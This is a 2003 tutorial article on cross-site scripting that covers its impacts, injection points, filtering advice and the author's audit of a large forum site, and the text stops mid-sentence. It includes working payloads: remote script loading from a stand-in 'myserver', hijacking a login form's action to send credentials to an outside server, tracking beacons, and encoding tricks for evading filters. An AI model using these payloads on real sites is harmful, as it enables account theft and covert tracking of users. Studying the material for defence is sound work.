Real World XSS Author: David Zimmer Site: http://sandsprite.com/Sleuth Downloads: http://sandsprite.com/Sleuth/small_xss_utilities.zip ----------------------------------------------------------------- Updated 11/04/03 - -Article Downloads included -HTML and downloadable CHM versions now available, see http://sandsprite.com/Sleuth/papers.html for links ----------------------------------------------------------------- Section 1 - Description, and overview -Introduction -Prerequisites -Impacts (Attack Scenario) -Impact Summary Section 2 - Methods of Injection, and filtering -Injection Points -Injection methods and filtering -XSS scripting tips and tricks Section 3 - Inside the mind, mental walk along of a XSS hack Section 4 - Conclusion ################################################################## Section 1 - Description, and overview ------------------------------------ INTRODUCTION ----------------------- So what is all the media fuss about XSS? For those of you who don’t know the acronym, XSS stands for Cross-Site Scripting. It is the term that has been given to web pages that can be tricked into displaying web surfer supplied data capable of altering the page for the viewer. This is a pretty broad term and I apologize, but as you will see XSS has such a wide ranging berth of attack vectors that such a Description is necessary. We have all seen the numerous Bugtraq postings "XSS FOUND IN MANY MAJOR WEB SITES" and we have seen the examples to prove it Does indeed exist, but many of these still leave many readers thinking "Ok, so they can throw up an alert box, how dangerous can that be?" This brings us to our first general truth..Finding XSS holes is the easy part, knowing how to creatively exploit them and assessing the possible impact of them is where the real coding and creativity comes in. There are many many documents on the web detailing XSS and generalized book definitions of it, what I haven’t seen is a practical approach and example usage of outside of the bounds of the few default examples usually given. I believe this has made people overlook XSS and not realize its true impact. For a brief background, I first started my study of XSS about 5 years ago, when I (ab)used it playing pranks in 'no rules' html chatrooms. From there I branched out using my knowledge and abilities to help secure sites and perform web application security audits. I have a personal fascination with programming and web technologies and have grown very familiar with windows programming, ASP, database and other web technologies. The knowledge contained in this document is a summation of these years of study experience, intuition and experimentation. Many of these concepts are things that I have been introduced to by piecing together bits of information and conversations over the years. I am presenting them all here together in one document because I have yet to find a comprehensive resource detailing the exact impacts in conversational real world scenarios. Prerequisites --------------------------------------------- Some topics basic to this document are an understanding of URL structure, and some knowledge of html and JavaScript. Additionally knowledge of URL encoding, http request methods and web application technologies such as ASP, would be helpful. XSS IMPACTS ---------------------------------- Before we look at the specifics of how these page alterations are possible, lets take a step back and enumerate some of the possible impacts XSS can have on your web site. The root question we should ask ourselves is what could an attacker be trying to gain by using XSS ? 1) Theft of Accounts / Services Of course the first thing that comes to mind when XSS is mentioned is Cookie theft and Account Hijacking. In fact, one of the default XSS examples shown to the public is alert(document.cookie) signifying the importance and inherent dangers of a third party being able to execute arbitrary web code in the clients browser. In a fair amount of cases, especially with older web applications, a stolen cookie can easily lead to account hijacking. This occurs when the cookie is used to hold all of the verification information on the client side and nothing is tracked on the server as to the surfers state or credentials. Some common motivations for this category would include: Identity theft Accessing confidential resources Accessing pay content Account Denial of service 2) User Tracking / Statistics Another usage of XSS is in gaining information on a sites web surfer population. As an experiment some time ago I set up a simple mechanism where I could literally monitor people’s clicks through a vulnerable site. Yes this is perfectly possible, and indeed was shockingly easy to do, Had I taken the experiment a step farther I could have also linked the surfers email address to their surfing habits and interests, stats advertisers and spammers dream of. 3) Browser/ User exploitation The second most common example of XSS exploitation provided is the venerable alert('XSS Example') script. A simple alert box is a very innate example of the type of attacks that fall into the category of user exploitation. One visit to George Gunskies Site or a review of some of the browser exploits discovered by ThePull should be enough to make anyone realize that surfing the web can be a dangerous experience. Imagine if I had, in the above example, not just tracked users, but had instead been trying to actively exploit them? I could have used an unknowing web site to discrimnate my malware to thousands of unsuspecting victims all at once! A couple things that I should also mention that may not be to obvious with this style of attack is A) to a casual surfer, your site is the hostile site B) I can be leveraging off of the credentials of your site. eg. Say Microsoft.com had a XSS hole that someone exploited like this. If I were to utilize a unsafe activex control in my exploit, surfers would take into account that this was after all Microsoft, and they very well may click ok to run it, even if they would not on other sites. c) I have a much much higher distribution rate and even a tighter target audience than I would through many other distribution types. d) I don’t actually have to exploit them, I can just steal them all from your site and bring them to mine. e) I might not even care about abusing your site, I might just care about the number of surfers I can hit and force into actions on other third party web sites. The Sub category of User exploitation is a subtle variation but a distinction worth making. Browser exploits rely on specific security holes in specific versions of web browser software. User exploitation is the act of forcing users to take actions on your behalf. These actions can include privileged actions only then can perform like account modifications, sending email etc, or they can just be used to force random unsuspecting web users to take general actions and give me an abstraction layer in the chain of evidence. 4) Credentialed Misinformation One of the most dangerous, yet often overlooked, is the danger of Credentialed Misinformation. Once we have active scripting executing in a browser, we can pretty much do anything we could desire with the pages content. If you were a large trusted news site, this could be quite a dangerous thing. Imagine seeing a link on a messageboard or email saying that there were a reactor meltdown on the west coast and thousands were dead and injured? the site was clearly a legitimate large news site and a trusted resource. The url looks legit, is only about 50 characters long and raises no suspecisions. When you get to the site, you are horrified to read through the pages of graphic detail. How can this be? With a XSS vulnerable site...it could quite possible NOT be. Misinformation attacks are not limited to news sites. With but a minor twist and a quick jaunt of thought, My originally email message could have appeared to have come from some popular web site you have an account with and asking you to visit this page to renew your password for security measures. Again the Url aims directly into the heart of your beloved site, so you think little of it and just fill out the information. What you don’t see behind the scenes is that the crafted url you clicked on got your browser to display a phony login page created by a malicious author and that the form just submitted all your login information to him. Congratulations you have been duped with the help of a XSS vulnerable site, and you will probably never know it. 5) Free Information Dissemination With the concept of page rewriting under our belts from the misinformation dialogue, the concept of free information dissemination is one of the next logical realizations we come to. Lets say I have a message I want to get out like SPAM or some political extremist message. In both of these cases It would be desirable for me to limit my personal attachment to the message and further draw out the evidential chain leading to me. Again I can utilize a XSS vulnerable site to show my message. All I would need to do is to post a crafted url on some messageboard, if the message was relatively short I could include it all inline in the URL and not have to worry about exposing my own web hosting account and linking it to the message, 6) Other This category is included for the simple fact that there are as many types of attack possible as there are attackers , motivations and technologies available to exploit. A couple scenarios that might fall into this category would be using random web user as an abstraction layer..forcing their browsers to silently make exploitive requests to other web servers. This blind proxying would again lengthen the evidential chain leading back to you. Another technique would be to use a XSS vulnerable sites large user base to chew up a smaller sites bandwidth. Just insert a 1x1 image src to the largest image on the target site. With a large enough viewing you could effectively chew up the targets bandwidth for a while. Finally there are techniques that aren’t really scripting attacks but are still html injection attacks and are worth mentioning because the filtering is still in our ballpark. Html injection attacks are ways to insert malicious html to wack someones web pages. A couple brief examples will be covered down in the filtering section. XSS IMPACT SUMMAARY ------------------------------ Now that you have seen of the possible utilizations of XSS, we shift gears slightly and summarize its strengths and weaknesses as an attack vector. Strength 1) can include a very large and target audience with one injection point. In some instances can hit every single user of your web application at once and be present on every single page they visit 2) can force a user to any action they are able to take, and can potentially access any information they can access 3) can be hard to detect and can be slipped in quietly, chain of evidence can be drawn out and not readily apparent how exploit or actions occurred 4) can be a powerful tool for information display and alteration. With the advanced features of IE and dynamic html, every portion of a pages content can be changed on the fly through active scripting. Weaknesses - XSS is 95% percent avoidable with proper filtering techniques on any user supplied data. While making sure that every element is filtered in large (and especially legacy) web applications can be a daunting task, properly implemented filters can prevent your site from falling victim to the above mentioned attack scenarios. To date there are several commercially available tools that will scan your web application and automate the task timely task of XSS enumeration. One such tool is of course WebInspect from SpiDynamics. What is the 5% that is unavoidable? Reality, we have to accept that web applications can be huge tangled beasts to edit and secure, we have to accept that even a small last minute modification can have unforeseen impacts, that no one can catch everything, that as new technology and browser capabilities emerge filters have to be reevaluated, new attack concepts and finally that there is nothing called a sure thing (tm). In the end its always better to know your process capabilities and accept the reality of the unforeseeable. ############################################################################### Section 2 - Methods of Injection, and filtering ----------------------------------------------- INJECTION POINTS - ---------------------------- The next logical step in understand XSS is to enumerate its injection points. Where can our web applications fall victim? Since XSS works as an interaction with active server content, any form of input should be filtered if it is ever to show up in a html page. The default example, and the easiest to exploit, is parameters passed in through query string arguments that get written directly to page. These are enticingly easy because all of the information can be provided directly in a clickable link and does not require any other html to perform. Many web authors feel that making their page only respond to POSTed inputs gives them an added layer of security against these types of attacks. While this can be true if coupled with other preventive measures, any where i can inject a html form and have the user click a submit button, I can get them to post to a form (and yes the form can be hidden and the submission easily automated). The above two examples describe active XSS attacks. That is to say ways in which a user has to take an action and make a choice to be hit with a XSS attack. This gives the user the opportunity to examine the link or to discover us, this is no good from the exploiters view. Sure it works, but it is to dependant and relies on us not getting caught and having the user care enough to take some action. More dangerous are passive XSS attacks. These are defined as attacks I can perform where the user will not have to take any action, they will not have to click on any link, and they will have no idea that anything out of the ordinary is occurring. These attacks occur automatically and can hit very very large audiences completely silently. If the user has to take no action, how does the malicious data make it to them? Database storage. Think of a messageboard, If I were able to post active scripting in my post, anyone who viewed my page would automatically be executing whatever I could cook up without even knowing it. Think laterally for a second and you will quickly realize that any data store your web app does that eventually makes it back for surfer viewing is potentially a target for a malicious user to create a passive XSS attack with. This is how I achieved the XSS User tracking mentioned in the above example. I was performing a security audit for a large forum site. The site allowed users to post articles and discussions and kept a marquee of the top 10 as part of its default page template. Every single page on the site had this marquee, and through parameter manipulation and its subsequent database storage, I was able to have the server output my tracking code to every single surfers that was on the site. I sat back, watched and catalogued all of the sites users as they navigated amongst the pages. Had this not just been a demonstration, I could have literally linked usernames and email addresses to those observed surfing habits. Probably not something you would desire for your prized user base. Sites that are particularly vulnerable to this form of attack would include guest books, html chatrooms, messageboards, discussion forms etc. If you have any of these on your site pay particular attention to filtering user supplied data. If you do find a XSS hole on your site, you must also make sure to scrub your database to break any of the existing code that may already be stored away. When you are doing the filtering remember to use case insensitive search’s, it is a simple mistake but much to easily overlooked. Another note worth throwing in here, is that as business apps with private intranets and integrated web applications become more prevalent, Even windows developers have to start concerning themselves with the dangers of cross site scripting. In a humorous example, the other day at work I was able to enter html code in a business app we are developing, which in turn became displayed in the web app interface we had integrated with it. This adds a whole new dimension to XSS and even Sql injection attacks, but alas I digress. One last Injection point to consider is your error pages. Some servers include special "404 Page Not Found" or servlet error messages that detail the page that was requested, or parameters passed in. If these elements are not filtered they provide a perfectly overlooked breeding ground for XSS injection. INJECTION METHODS AND FILTERING... ----------------------------------------- Now that we have a handle on the breadth of the problem, and where the malicious input may come from...we have to understand just what data may be thrown at us and how to combat it. Active XSS is relatively easy to prevent by filtering out a series of characters in any user input received. Since each page has a defined window of inputs, they can all be filtered in a quite logical sequential way. When we migrate to shielding against passive XSS attacks it is somewhat of a different story. Often user information and data is taken in through a series of web forms. The final pages, a conglomeration of many users supplied data. Of course, again all input data must be filtered, but typically there are many more places for err to crop up. This problem is compounded by the desire for many of these types of datastorage web applications to allow the user to enter some html inputs. Html is a very dynamic and free flowing language. Something that allows the web to be as advanced and colorful as it is, and also something that can make it a nightmare to parse and filter. To make matters even worse, browser technology and features are expanding at an incredible rate. While this makes the web fun and dynamic, it makes the security auditors job more difficult. How can you expect a legacy web application to take into account new features, protocols and attack vectors? You cant. The easiest way to deny cross site scripting (and probably the only really secure way) is to deny users the ability to use any form of html in their data. If you would like to allow html, just realize that your filtering routines must be designed very wisely. Many many very large high profile sites have had XSS holes discovered in them as the result of filter loop holes, including Yahoo and Hotmail. The next logical step is to see some examples of just how XSS can get inserted into a page. I have created a simplistic asp page that will walk you through some common injection points and example exploitation of it. Please take a few minutes to read through it and play with the examples. To see how it all works right click and view source and identify where the injection occurred. [ insert url of demo page here ] FILTERING ---------------------------------------------- Filtering can be both a relatively simple matter, and a vastly complex one all at the same time. The incongruece lies in the extent of your needs. Your server side scripting language of choice can also help you minimize your exposure. Before we get into active server languages just let me admit I am most familiar with asp so that is where the heft of my examples shall rest. Lets assume you have a parameter coming in that you expect to be an integer. That assumption can often be your downfall, which incidentally is also why these types of parameters are often found to be sql injection points as well. Anyway.. integer types are easy to filter. Actually we can let the ASP engine cleanse these for us in one step. Consider the asp line: x=cInt(Request.QueryString("num")) What happens if our friend num is not an integer? ASP engine throws an error Microsoft VBScript runtime error '800a000d' Type mismatch: 'cint' Well that handles that. In perl I believe simply adding +0 to the variable will have a similar effect and force the variable to be numeric. But what about string types? That is where the brunt of the work is going to lie and where all of the problems begin. If we do not want to allow any html input what so ever then our job is simple. Remove all < signs and quotes and we should be pretty safe as long as any html we insert into dynamically is always wrapped in a quoted string. Note that if we had a page source something like: > In this example removing quotes and < will make it very hard for an attacker to create a usable attack but I would not venture to say it impossible. Since the src= attribute is not quoted in anyway, there is nothing for them to have to break out of. If the next img value merely contains a space in it they will effectively be out of the src= attribute and able to insert their own code such as onerror=. Even though technically they will be able to execute code with this technique, scripting without the use of quotes is extremely hard (or at least I haven’t discovered the trick to it yet) see the tips and tricks section for some techniques I am playing with to try to work around it. The last category and the most in-depth to cover is the technique and considerations of allowing only some html content and trying to deny the use of malicious html and scripting. Users who would use these techniques include web mail providers, message boards and html chatrooms. Before we go into script filtering we should expand on the definition of malicious html some. If an attackers goal is only to wack your site he might be just as content to make your new message board unusable to others as he is to use it to exploit all your surfers. This could easily be done through pure html tags with no attributes. It is doubtful that you would want your users to have the ability to enter a tag that would turn the rest of your html page and forms into an unusable blob of text. It is also unlikely that you would want them to embed a 10000000 x 10000000 image of two elephants mating. When it comes to allowing users to post html, just beware that you are in it for the long haul. Both in maintaining your filters to current technological demands as well as accommodating for non script based attacks. Enough digression. Onto the filters. A good disclaimer to enter here is that I am not that experienced in creating keyword filters. When it comes to my projects I filter exclusively no html. I do however have alot of experience working around filters and have read alot of discussions so with that in mind here we go. The only sane implementation I have heard of is allowing a very confined list of html you want to allow and denying all other tags. This could be implemented by splitting the textblob at all < signs and then reading up to the first space in each element to see what the tag type was. If the tag was recognizable and allowed then grab the offset of the closing tag and replace the substring with a clean no attribute version of it. If the tag was not allowed then it would be removed. If the tag was not allowed and did not contain a closing > then I would ummm I don’t know I would have to define the filter and experiment alot :) For tags where you absolutely had to allow attributes such as img src= tags, I would grab the necessary src= attribute, validate it, and then insert it into my own clean img src= tag so I didn’t have to worry about any event handlers or lowsrc or dynsrc or the like. The same technique would be applied to href= attributes. A safe list of tags to allow along these guide lines would be: <font face= size=></font> <b></b>, <I></i>, <u></u> <img src=> <a href=></a> Etc.etc. Really this is probably all I would allow by default. IF you need more follow the above guidelines on implementation. So assuming you follow the above guidelines and allow no tags and no attributes other than those you copy over to the saved data what will you have to validate to make sure your users are safe? If the above list is all you allow, I will assume you can manage validating the font size= and face= parameters. Img src and href= are two big ones worthy of many debates and many dangers that I will attempt to present next. Lets first look at our img src tag. We have cleansed it from all the tricks of lowsrc dynsrc, event handlers and style elements simply by parsing out the src= element. Now we must validate it. I am walking through thoughts here as we go, so please forgive any jumps. 1)We have to quote the src= string to be safe and accommodate for urls with spaces. 2)We should remove all single & double quotes in it. 3)I would reject any urls with ? querystring identifiers in it and make sure that it did not have .cgi, .pl .php .asp etc in the querystring. Sure we could make a .jpg a perl script but we cant account for every loop hole and this is already an overcautious measure against webbugs. 4)Next I would check the protocol. I would deny anything that wasn’t explicitly http:// So what do these filters prevent against? Quoting the string makes sure they cannot escape the element attribute and insert their own event handlers. This must be don’t in conjunction with step 2 replacing all quotes. Actually you probably don’t have to replace both, just the ones you use to quote the string with your src= element. Denying all urls (for img src any) that had ? or reference to a server script would deny users the ability to webbug your surfers. A danger of this could be collecting stats on users and site and tracking users across pages by their referrer. !!Note that any link aiming off server will reveal http referrer headers. This is a major reason why web developers are told not to include important info in query strings and how I used to collect admin logins to chat servers :P (It may also be a good idea to add target=_blank to all links to avoid a possible referrer leak,[but there will always be a referrer leak for img src tags]) Next we validate the protocol. For obvious reasons we probably don’t want to allow the file:// protocol on links or images. For equally obvious reasons vbscript: and javascript: would be an unpleasant experience. In the end it will be best to not worry about what is there, and only worry about what isn’t. No http:// at the beginning of the string, then deny the tag. The reason is it is relatively easy to add protocol handlers to windows. Aim:// has its own that may have been found vulnerable as well as icq:// if these protocols are present in an img tag that may be enough to make the browser fire the registered program type. As a humorous example, back in the days of IE5 I used to embed an img src=telnet://myip:23 and then run a custom daemon. All of a sudden my friends would complain that some window had popped up and that someone was typing text to their screen! Heh parlor tricks gotta love em. On a more serious note, you can see the possible danger. One other thing I just thought of is the possible danger of line break tricks. If you follow the above explicitly you should be ok, but if you were to vary at all you should be aware that there is a whole subsection of filter bypassing techniques based on inserting CR, LF or CRLF into input strings. I have also seen javascript execute with a -> breaking it up. Consider how these may impact your filters That should give you the basis for a sane implementation of a minimal content keyword filter. If you try to base your filters off of just replacing keywords you are going to run into all kinds of complexities like new elements, attributes you didn’t know about, weird event handlers, script encoding, and even multiline tags that can throw your parsing for a loop. If you want to try any of those techniques may the force be with you luke *breathes like darth vader* XSS SCRIPTING TIPS AND TRICKS --------------------------------- Well I couldn’t resist this section, this is where I have my most fun anyway. This is some of the techniques people can hit you with with XSS Q) Just how much script can you inject in an image src tag? A) Its a different style of coding but it can get quite complex :) ---------------------- <img src="javascript:txt='UghhOghh.!!! My Screen Just Ran Away!!!'; txt2='Now come on you have to admit that was funny *S*';x=0;y=80; function niceguy(){nice=confirm(txt2); if(nice==1){window.setTimeout('parent.window.moveTo(0,0)',2100)};} function ha(x){parent.window.moveTo(x,y);if(x==1800)alert('Hehehe...me went Bye-bye ; )'); window.setTimeout('if(x!=1800){ha(x+=30);};else{niceguy()}',25)}; alert('*Yawn*..me tired');ha();"> ---------------------- Q) What are the biggest tricks useful in XSS javascripting? 1) knowing how to embed nested quotes is a necessity you can escape quotes in a quoted string like this \' or \" or you can use the unicode equilivents \u0022 and \u0027 ex: alert("\u0022") or alert("\"") 2) keyword filters that allow any js to execute are useless ex: a='navi';b='gator.userAgent';alert(eval(a+b)) 3) short input length + script block embed = unlimited script power if you can squeeze in an script src= 4) ssl pages warn if script src= comes from untrusted site, but if you can upload anything to the server like image or article that is actually .js file commands, you can bypass this warning because script src=file.jpg (also useful to help bypass input length reqs (also note IE doesn’t care a wink about file extensions on script src= files :) 5) you can read an entire pages content with javascript in IE, not just limited to manipulating form elements. You can also edit the page on the fly. learn your dhtml object model danielson ! 6) event stealing: say a page with a log in form has a XSS hole, document.forms[0].onsubmit=myfunction document.forms[0].btnNew.onclick=myfunction document.forms[0].action="http://myserver/myscript.asp" 7) styles trickery. I have to learn these tricks too! but from what I have heard hinted at and mentioned in passing there are some cool power tricks to be had! 8) be familiar with methods of script encoding. <img src='vbscript:do%63ument.lo%63ation="http://www.yahoo.com"'> <IMG SRC="javascript:alert('test');"> <IMG SRC="javasc ript:alert('test');"> <-- line break trick \09 \10 \11 \12 \13 as delimiters all work. 9) working with no quotes (also necessary dealing with injection on php scripts) with php scripts any " or ' we inject is automatically turned into \" and \' respectively :( this is a big problem for complex scripts. It kinda works ok for event handler insertion we can still close the parent quotes because html doesn’t understand the \" escape sequence and only sees the " this would let us use simple things where we could get away with only using strings already found in the document, numbers variables, etc but what if we need to include our own string? chew on this: regexp = /this is my string its actually a reg expression/ alert(regexp.source) I haven’t really decided how useful an evasion this is yet. I myself am still chewing away like overcooked steak. With this we can get away with no quotes, however / which we need for urls are special chars and need to be escaped in the reg exp. and php takes \ (which is the reg exp escape char as an escape char and escapes it to \\ so that is confusing. however we also have the power of regexps in our toolbox and we have a host of built in objects to generate and build up strings from so something like: n=/http: myserver myfolder evilscript.js/ forslash=location.href.charAt(6) space=n.source.charAt(5) alert(n.source.split(space).join(forslash)) //document.scripts[0].src = n.source.split(space).join(forslash) a little tricky but doable that chewed well after all *yummie* another trick that could be useful with the no quotes hack is a simple script encoder such as the below example pcent=/%/.source str=/20616c657274282774686973206973207265616c6c7920636f6f6c212729/.source temp=str.substring(0,0) for(i=0;i<str.length;i+=2){temp+=pcent+str.substring(i,i+2)} eval(unescape(temp)) Voila, complex embeddable scripts with no quotes or forward slashes. ################################################################## Section 3 - Inside the mind, mental walk along of a XSS hack ----------------------------------------------- In this section I am going to document some of actual scenarios I have found in the wild and what could be done with them. In essence these are some of the experiences that made this paper possible. All of the holes I am going to document here were in a large forum / community type sight that shall remain anonymous. All of these tests were done legitimately with the blessing of the sites owner and were matters of testing as I conducted a security audit on his site. Every tester knows how monotonous churning through page source and repetitive tests can be, so I took it upon myself to play and experiment and see what I couldn’t squeeze out of some of these seemingly innocuous holes and tried to gauge the real impact of these forms of attack. Before we get started with the details I will describe the web sight a little more. The site in question was a large forum type site. Users could login, browse other users articles and submissions as well as leave messages to each other on numerous messageboards. Each user also had an account modification section where they could update their stats as well as manage their submissions to the site. The main site consisted of a template with search engine functionality as well as a ticker of the most recent articles submitted by users. This is a relatively large site with anywhere from 3-10 thousand users online at any given time. As the audit progressed I soon found that by going to the user management interface I could embed img src scripts and other html in the author name field. Reflecting back on the layout of the site I knew that this would allow me to execute scripts on anyone who visited one of my submissions. I also knew that this would execute anytime my name turned up as a result from the site search functionality. Now the gears start churning, hummm what can I do with this? Since I am the curious type (and mabey a touch mischievous) I decided it would be a worthy cause to play with the hole and try to gauge the actual impact. The first thing I wanted to determine is how popular of a cat I am ;) (Or in more professional terms, how often my pages were being viewed and the scope of the injection vector) Since I could insert img tags this much could have easily been done just by inserting an img src=http://myip and then watching server logs, but since this is a cross sight scripting paper, and that is to boring, I decided to play with some other techniques. Just for fun I though it would be cool to try to get use the img tag to try to inject a full script into the page. Of course this can be done inline with creative javascript, lots of semicolons and specially designed strings and functions as in the above example, but that is alot of work. Wouldn’t it be nicer to just be able to inject a whole script file and not have to worry about complex messy embedded commands? Of course it would. So how do we get a hapless image tag to do this, and moreover how do we do it so that unsuspecting web surfers don’t notice a thing. Having the site we are auditing all of a sudden get wacked by a bunch of kids who notice the hole because we were playing with it would just be not good. So we will just have to be a little sly and a little careful. If we inject a image to a non existent url, it will fire the onerror javascript event handler, but it will also leave that ugly little broken image placeholder in the document. Sure those raise little suspicion and are common place, but I still see it as evidence. So with this in mind we will img src a 1x1 pixel transparent gif image that will load seamlessly and be undetectable to browsers. Loading a successful image raises the onload event handler, here is where we can put our payload with a url such as this. img src='http://valid address/clear.gif' onload='document.scripts(0).src="http://myserver/evilscript.js"' Examining the above code you will see that instead of trying to embed some long complex nested javascript inline I chose just to set the script src of the first script on the web page to be my script. This makes the browser (IE6 anyway others untested) load my script and execute it. My EVIL script in this case was just a one liner, a simple document.write('some innocous text') In this way I get to play a little, I get to see who loads a page with my name on it and I coat it over so that they never know the difference. The text contained in the document.write code appears right inline in the page next to where ever the img src code executed. I set up my smallserver to dish out the script file (a small web server package I made especially for playing with xss holes that logs directly to screen and is included in the support file zip.) With the above in motion I went back to the site, logged in and changed my name to include the injection script, from the sight stats atop the page it appears that there were some 3000 potential victims.. err test subjects.. afoot. I submit the data and then quickly hop to one of my articles to make sure all is working as planned. Sure enough up pops a request on my servers screen and there is my innocuous inline text. So far so good, now the waiting game has begun as I anxiously and nervously await the results. Wait, wait, wait, hit ! This is just like fishing :) Slowly request after request rolls in, I casually wade through the data I am collecting with a giggle noting the browser people are using, where about in the world they are from, and what search topics they had requested that had turned up my name. After about 5 minutes of data trolling I decided I had indulged my curiosity enough and was ready to move on. 5min collection yielded 20 hits, which doesn’t sound like a lot given that there are 3k plus people online, but it should also be noted that I only had 8 articles on the site out of hundreds of thousands. Had I been a little more daring I probably should have expanded the test a little to do some simple script tests to see what percentage of the user base I hit had been actually logged into the sight at the time. But that is borderline unethical so. With that experience under my belt I got to thinking, given enough time and less morals I could have collected all kinds of stats on users, stolen account info, email addresses etc. (yes full login information and email addresses were held in the cookies of logged in users on this site) Since morals being what they are, I instead shifted my attention to a bigger hack. I wasn’t satisfied that I could slowly trickle in info..I wanted INFO and I knew that it was out there 3k users online...humm how can I impact them all? In the days to follow further examination of the sight revealed that in one of the asp interfaces I could inject scripts into the article name pane but it had to be done in 45 characters or less. Again examining the layout of the sight to gauge the impact I found that as in the above example it would hit users who returned me as a result of a search. However this time if it was a new article submission that still appeared in the ticker my code would be output to every single user on the site at once and be on every single page they visited! My heart thumped as my head swam in ideas of the things I could do. I could track users across pages, I could correlate email addresses to viewing preferences and topic searches. I could literally build a profile of the surfer and even do it in a personal way. What marketing firm wouldn’t love those kinds of stats? A more malicious individual could also take other routes such as account theft, redirect surfers to other sights etc.. but since we have already covered the dangers and why you should be wary of XSS we wont dive into that again. Ok, so if I can inject a script in 45 chars or less, thousands of users info will be at my fingertips. hummm. <script src='http://geocities.com/dzzie/x.js'></script> = 55 characters junk Nosing around the sight some more, I remembered that it had upload functionality for both user documents, zips, and author images. User documents were always inserted into the sites template so weren’t usable for this. the Zip files were scanned and opened to make sure they didn’t contain any virii. This left us with an author image upload. Luckily after upload the 'picture' was just given a server defined name and stored to disk without being validated or resized as an image. Perfect :) So I create my evilscript file and rename it somthing.jpg. I goto my user manager and upload it as my author info for my bios. Then I goto my bios page and snag the url and name the server gave my file /images/778237.jpg Just to double check it was still valid I fired up WebSleuth and made a raw http request for the resource. Sure enough it spit out my script file and no extra data. going to craft my injection string I try on the fit of my new url <script src="images/778237.jpg"></script> = 41 characters Cool, I can just sneak in the script with room to spare. Just to be thorough I go back and edit one of my old submissions with a simple safe script. Sure enough IE loads the script without a complaint of the extension and we are in business. Soda in hand, interface pages bookmarked I set out for some more stat taking. I knew the test was going to work, and I knew the impact, but somehow that little kid in you just has to pop out and have his moment of fun, just to say you did it. I submit a new article, I hop to my bookmarked page to edit the article (where the validation hole was), paste in my injection string and submit. Now since the script resided on the server, I could not watch user stats roll in from requests of the script file itself. How then did I collect stats on the users on the sight? Here is another thing worth understanding about cross sight scripting. Data collection methods. How did I not detail this above. Anyway, my script is executing on all of these random users machines from locations across the globe. How do I receive the data the scripts collect? There are alot of ways to collect the data, you can collect it by watching server logs as we did in the first example.or you can also collect data by forcing the users to submit data to CGI scripts which neatly break down and process the data. The problem with both of these techniques though is that it requires some level of commitment on the attackers part to either reveal his own IP or to reveal one of his web hosting accounts. Of course there are many anonymous ways as well. Submitting data to a rouge CGI mailer script, forcing the user to post to an anonymous messageboard or guestbook script, or even using an unsuspecting trojaned user as a data collector. In the end tracking these types of attacks can be very very tricky if not impossible if done right, but we aren’t going to get into all those possibilities now. For our application we are simply interested in what browser the users are using and what page they are on. Luckily both bits of information are standard browser information leaks given out with any request for a web resource. To keep the test as simple and non-damaging as possible I choose to just use a small javascript that would change the img src of one the documents images to be the url of a cgi script I had running on one of hosted accounts. Another thing I had to consider in such a stunt was that I couldn’t use my own ip or server for two reasons. thousands of hits would QUICKLY flood my connection and could quite possible DOS me to the point I couldn’t keep up with the cgi data and I could probably be web wacked for quite a while not allowing me to change back the data to effectively "turn off" the onslaught. Why web wack yourself if you don't need to right ;) So, the script commands in the jpg file were this document.images(0).src="http://myserver/cgi-bin/logit.pl" My logit.pl script was a script that executed on the server. When it received a request it would just log the ip, useragent and referrer passed in the HTTP header to a database and would then output a 302 Document Moved Header which would automatically redirect the browser to an actual image file. Since every page on the site was served with the same template I knew the image I would be changing would always be the same, so I just redirected the url back to that image so they wouldn’t see even a broken image icon. I am so considerate. Had I been the nosey sort, I could have collected some real data on the surfers and used the javascript to do whatever and then append it to the query string of the img url. Had the data been to long to be passed in on a query string, then I could have used the javascript to dynamically write a hidden iframe to the parent document, written a simple form the window, filled in the elements and then posted it off to the server side script. No need to try to script across domains or worry about domain security models. Ok changes made, script in place. I would give it about 20 seconds for data collection, not wanting to wack my hosted site or expose to many people, then I would change it back. and be off to reap the rewards of my collected data. As I sat and contemplated, I decided there was no need to carry through to the end goal. I knew it would work and had proven all the steps to myself before. Not quite content to just pack up and go, I changed my injection script in the jpg file to a simple document.write('some simple text for articlename') Making the changes and watching the ticker scroll my little inconspicuous message and knowing that it was also scrolling away on 7k other machines across the net was enough to give me the satisfaction of the moment. I then went back and changed the article name to the same text I had used in the script and no one was any the wiser. As my moment of victor waned and with it my perma grin of the private joke, I went back to examining the site. For the sake of brevity (to late now you say?) I am only going to include 2 more examples of XSS holes I found in this site, both of which demonstrate techniques and concepts it is good to be aware of. The next hole I found was a login page. If you were on the site and tried to perform an action that required authentication as a user, it would redirect you from the page you requested to the login page passing the referrer page in the querystring. Since this referrer page was always handled internally it was assumed it was always a safe value. Not so safe :) I could inject any script I wanted as its value in the querystring. This example is what I term event stealing. First, to discuss briefly, is how you could entice users to the login page. Isn’t the URL going to have a long querystring on it or the obvious <script src=></script> blocks ? Do you recognize this as script blocks at a glance? %3C%73%63%72%69%70%74%20%73%72%63%3D%62%6C%61%68%3E%3C%2F%73%63%72%69%70%74%3E of course a fully encoded section of url is suspicious. So how about mixed encoding and then viewed in its natural habitat. http://login.asp?lan=en%2021&count=100&exp=12&ref=%3Csc%72%69pt%20s%72c%3Db%6Cah%3E%3C%2Fsc %72%69p%74%3E It doesn’t look so obvious now the url isn’t overly long alot of people just click anyway. If you can put link text as something similar they won’t even think twice. Anyway I digress lets not worry about user tricking and just assume they are there. Event stealing is when you replace an even they have setup in a page with your own commands. For the example of a login page, Sure you can inject a script, but the page contains no data until they fill it in. So you have to wait. You could use a timer or some bogus logic but the best way to know when to snag the data is steal the event of form submission. Actually you could steal the submit button press, which could fail because of validation routines, or you could just steal the onsubmit event of the form or even the unload event of the page. If you were to choose the onunload even of the page, you would be kinda stuck. The page is closing, you don’t have time to change an img src and would be force to open up a new pop up window. This is way to obvious. This leaves us with two approaches either document.forms(0).onsubmit = ourfunction or you can just steal the whole form submission and make it submit to your own server side script document.forms(0).action ="http://myserver/myscript.asp" then redirected them back to the proper script and hopefully they wont notice. The last Example we will dive into is a SSL encrypted page example. SSL and high encryption just seems to make developers and surfers feel so warm and fuzzy inside. Haha you cant get meeeee. *cough*cough* This is a bit of myth. Sure the data transfers are sound, but if an SSL encrypted page has a cross sight scripting hole all of that transport layer security is blown right out of the water! Same sight, different page. We are in an account management page. It is SSL encrypted because it contains information on credit accounts and payment options. Since it is SSL the developer felt safe including plaintext username and password information in the form. The problem is that the server script took a querystring argument from a previous page and echoed it directly to the page source with no filtering. Again we have a 45 character input limit. Now because the page is SSL encrypted, even if we could slip in a script src= to our server, the browser would complain that the page contains unsecure items. We don’t want this. We want the surfer to feel warm and fuzzy and we want to hide in our dark alcoves. The answer to this conundrum is again a script file embedded on the server somehow. Again the 